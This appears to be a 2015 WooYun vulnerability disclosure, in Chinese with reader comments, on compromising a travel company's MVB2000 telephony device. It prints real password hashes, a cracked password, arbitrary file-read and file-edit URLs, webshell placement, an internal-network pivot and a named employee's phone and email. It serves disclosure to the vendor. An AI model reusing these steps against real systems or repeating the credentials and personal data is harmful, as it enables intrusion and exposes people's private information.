# Change the ".your-domain.com" to match your domain to enable.
#
#<Location /server-status>
# SetHandler server-status
# Order deny,allow
# Deny from all
# Allow from .example.com
#</Location>
#
# Allow remote server configuration reports, with the URL of
# http://servername/server-info (requires that mod_info.c be loaded).
# Change the ".example.com" to match your domain to enable.
#
#<Location /server-info>
# SetHandler server-info
# Order deny,allow
# Deny from all
# Allow from .example.com
#</Location>
#
# Proxy Server directives. Uncomment the following lines to
# enable the proxy server:
#
#<IfModule mod_proxy.c>
#ProxyRequests On
#
#<Proxy *>
# Order deny,allow
# Deny from all
# Allow from .example.com
#</Proxy>
#
# Enable/disable the handling of HTTP/1.1 "Via:" headers.
# ("Full" adds the server version; "Block" removes all outgoing Via: headers)
# Set to one of: Off | On | Full | Block
#
#ProxyVia On
#
# To enable a cache of proxied content, uncomment the following lines.
# See http://httpd.apache.org/docs-2.0/mod/mod_cache.html for more details.
#
#<IfModule mod_disk_cache.c>
# CacheEnable disk /
# CacheRoot "/var/cache/mod_proxy"
#</IfModule>
#
#</IfModule>
# End of proxy directives.
### Section 3: Virtual Hosts
#
# VirtualHost: If you want to maintain multiple domains/hostnames on your
# machine you can setup VirtualHost containers for them. Most configurations
# use only name-based virtual hosts so the server doesn't need to worry about
# IP addresses. This is indicated by the asterisks in the directives below.
#
# Please see the documentation at
# <URL:http://httpd.apache.org/docs-2.0/vhosts/>
# for further details before you try to setup virtual hosts.
#
# You may use the command line option '-S' to verify your virtual host
# configuration.
#
# Use name-based virtual hosting.
#
#NameVirtualHost *:80
#
# VirtualHost example:
# Almost any Apache directive may go into a VirtualHost container.
# The first VirtualHost section is used for requests without a known
# server name.
#
#<VirtualHost *>
# ServerAdmin webmaster@dummy-host.example.com
# DocumentRoot /www/docs/dummy-host.example.com
# ServerName dummy-host.example.com
# ErrorLog logs/dummy-host.example.com-error_log
# CustomLog logs/dummy-host.example.com-access_log common
#</VirtualHost>


看到了htpasswd的位置
再读取htpasswd

wwwadmin:974WFUub5vVFs
maint:GSJpB.Azs2q.o
mvb2000admin:pnCxDNtgSg9pw


#Password protect /var/www/html/mvb2000adv
<Directory /var/www/html/mvb2000adv>
AuthType Basic
AuthName "\?c7\?eb\?ca\?e4\?c8\?ebMVB2000\?b8߼\?b6\?b9\?dc\?c0\?edԱ\?d0\?c5Ϣ"
AuthUserFile /usr/local/apache/passwd/wwwpasswd
Require user mvb2000admin
</Directory>


发现是要mvb2000admin的用户进行认证

1111.png


使用gpu来破解mvb2000admin:pnCxDNtgSg9pw ,成功破出6t5e8uop
但是系统管理里面的几个链接都不能登陆,我也是日了狗了,浪费了大量时间来尝试
后来想到可以使用mysql导入shell,后来导入失败,没有文件权限。到这里陷入了僵局
读文件也不行,上面提到了不知道web目录,虽然配置文件泄露目录是/var/www/html,但是真正的目录是/var/www/html/xxx,后面还是有目录的,这个目录不知道,到这里已经觉得彻底没戏。
想了一天多,我好像发现我傻逼了,因为配置文件里面写了

#Password protect /var/www/html/mvb2000adv


后面给出了目录,我果断访问http://mailserver.handhand.net:7002/mvb2000adv/

1111.png


发现和系统管理的认证框是不一样的

1111.png


说明之前找到的htpasswd密码是针对mvb2000adv的目录。,我说怎么登陆不上去了
我已经无语,我真的是菜!

1111.png


成功登陆
发现确实是同程网的系统

设备序号:	 	IPX001505
集成日期: 2013-06-08
单位名称: 同程网络科技股份有限公司20130621
单位地址:苏州工业园区星湖街328号(崇文路口)创意产业园内5栋A座、B座
联系人: 蔡良热
电话: 0512-82276000
手机: 180202800076
邮箱: clr@17u.cn


并且7000端口系统的htpasswd里面的mvbadmin密码是123456,我也是醉了,还破了好久密码(7000端口和7002端口系统版本不一样)
既然登陆进去了,尝试getshell

1111.png


在配置文件编辑的菜单里面,感觉可以getshell
他给出了一些路径,可以选择比如:/var/www/html/panel
url就是

http://mailserver.handhand.net:7002/mvb2000adv/configedit/?dir=/var/www/html/panel


尝试访问

http://mailserver.handhand.net:7002/mvb2000adv/configedit/?dir=/etc


然后修改上面的参数

http://mailserver.handhand.net:7002/mvb2000adv/configedit/?file=passwd&section=passwd


成功读取出/etc/passwd

3333.png


说明可以读取修改任意文件
那就找到web目录下的文件,然后修改好了
最后选择了/var/www/html/panel/index.php
插入webshell,成功getshell!
整个过程累成狗
http://mailserver.handhand.net:7002/panel/index.php

1111.png

漏洞证明:

注入后注入出账号密码,可以登陆进分机管理,如图,泄露出了好多公司电话通信
并且搜索出存在注入,可以列出公司几年来的所有电话

1111.png


管理后台分级用户显示系统应该处于核心内网

1111.png


简探测下内网reGeorgSocksProxy+sockscap轻松实现

1111.png


2222.png


testlink是存在漏洞的,不过网速慢,就不在深入了,只做证明

修复方案:

版权声明:转载请注明来源 if、so@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-09 13:29

厂商回复:

感谢关注同程旅游,唉,这个设备的注入我们是发现了的,感觉比较鸡肋没处理。没想到能getshell,姿势不够啊。

最新状态:

2015-09-09:一般来说同程的漏洞我们倾向于当天修复,当天公开,让大家尽早学习白帽子的思路。但是因为这个涉及到一个设备的通用漏洞,也有少量的设备开放在外网,我们会等设备厂商处理的差不多了再予以公开。至于洞主没提交通用而漏掉的乌云奖金,同程来补上。


漏洞评价:

评论

  1. 2015-09-09 13:32 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    设备注射来报通用啊

  2. 2015-09-09 13:32 | sqlfeng ( 普通白帽子 | Rank:195 漏洞数:32 | 不会弹吉它的黑客不是好歌手)

    !!!!!!

  3. 2015-09-09 13:33 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    我的天啊,哎

  4. 2015-09-09 13:35 | 苏州同程旅游网络科技有限公司(乌云厂商)

    @xsser 疯子准备报的,实例不多就算了...

  5. 2015-09-09 13:43 | answer ( 普通白帽子 | Rank:367 漏洞数:47 | 答案)

    哈哈

  6. 2015-09-09 13:56 | 正义的伙伴 ( 普通白帽子 | Rank:101 漏洞数:28 | 正义!!)

    好吊!!

  7. 2015-09-09 14:03 | Submit ( 普通白帽子 | Rank:436 漏洞数:95 | 就是一屌丝)

    @苏州同程旅游网络科技有限公司 色色的表情

  8. 2015-09-09 14:04 | BMa ( 普通白帽子 | Rank:1811 漏洞数:202 )

    @苏州同程旅游网络科技有限公司 你们到底是谁上的这个账号?

  9. 2015-09-09 14:14 | 苏州同程旅游网络科技有限公司(乌云厂商)

    @BMa 上次跟你们吃烤鸭的那个 疯子同事 有的时候是疯子回 有的时候是我回

  10. 2015-09-09 14:28 | qhwlpg ( 普通白帽子 | Rank:228 漏洞数:59 | 潜心代码审计。)

    厉害啊

  11. 2015-09-09 15:14 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    挺会找漏洞的小伙子

  12. 2015-09-09 18:11 | chock ( 实习白帽子 | Rank:58 漏洞数:15 | 今夜我们都是wooyun人,我们一定要收购长亭)

    好像很叼的样子

  13. 2015-09-09 21:03 | if、so 认证白帽子 ( 核心白帽子 | Rank:1008 漏洞数:92 | 梦想还是要有的,万一实现了呢?)

    好厂商,赞一个

  14. 2015-09-09 21:42 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @if、so 应该的,真心感谢!

  15. 2015-09-09 22:10 | 李白 ( 普通白帽子 | Rank:142 漏洞数:29 )

    感谢关注同程旅游,唉,这个设备的注入我们是发现了的,感觉比较鸡肋没处理。没想到能getshell,姿势不够啊。

  16. 2015-09-10 20:20 | 带我玩 ( 路人 | Rank:12 漏洞数:6 | 带我玩)

    设备注射来报通用啊

  17. 2015-09-21 10:33 | if、so 认证白帽子 ( 核心白帽子 | Rank:1008 漏洞数:92 | 梦想还是要有的,万一实现了呢?)

    @苏州同程旅游网络科技有限公司 礼品卡收到了,谢谢

  18. 2015-10-09 17:22 | YY-2012 ( 普通白帽子 | Rank:2867 漏洞数:653 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    @苏州同程旅游网络科技有限公司 找了一些MVB2000案例测试,未发现有注入,可能跟版本问题。

  19. 2015-10-24 15:19 | f4ckbaidu ( 普通白帽子 | Rank:189 漏洞数:25 | 开发真是日了狗了)

    至于洞主没提交通用而漏掉的乌云奖金,同程来补上好厂商,必须赞一个!!

  20. 2015-10-24 15:21 | DloveJ ( 普通白帽子 | Rank:1134 漏洞数:202 | <a href=javascrip:alert('xss')>s</a> 点...)

    @if、so 这条nmap命令是什么

  21. 2015-10-24 17:16 | 偏執誑 ( 路人 | Rank:4 漏洞数:1 | To the world , you maybe just one person...)

    为厂商点赞

  22. 2015-10-24 17:18 | 偏執誑 ( 路人 | Rank:4 漏洞数:1 | To the world , you maybe just one person...)

    思路也是够淫荡,好想要五万个域名的字典(+﹏+)

  23. 2015-10-24 19:08 | 野驴~ ( 路人 | Rank:5 漏洞数:2 | 充满强烈好奇心的菜鸟。)

    为厂商点个赞@同程

  24. 2015-10-24 20:15 | 李叫兽就四李叫兽 ( 实习白帽子 | Rank:56 漏洞数:22 | 啦啦啦啦)

    赞啊

  25. 2015-10-27 09:37 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    @if、so 赞大牛,请问一下,http://mailserver.handhand.net:7002/mvb2000adv/configedit/?file=passwd&section=passwd,从dir到file可以想到,后面这个“section=passwd”是怎么想到的?有提示缺少参数吗?还有GPU跑也是杠杠的+++

  26. 2015-10-27 09:47 | if、so 认证白帽子 ( 核心白帽子 | Rank:1008 漏洞数:92 | 梦想还是要有的,万一实现了呢?)

    http://mailserver.handhand.net:7002/mvb2000adv/configedit/?dir=/etc,你先访问这个,那么后面在访问file就是etc下了,所以可以编辑任意文件

  27. 2015-10-27 09:54 | 高小厨 ( 普通白帽子 | Rank:821 漏洞数:74 | 不会吹牛的小二不是好厨子!)

    赞啊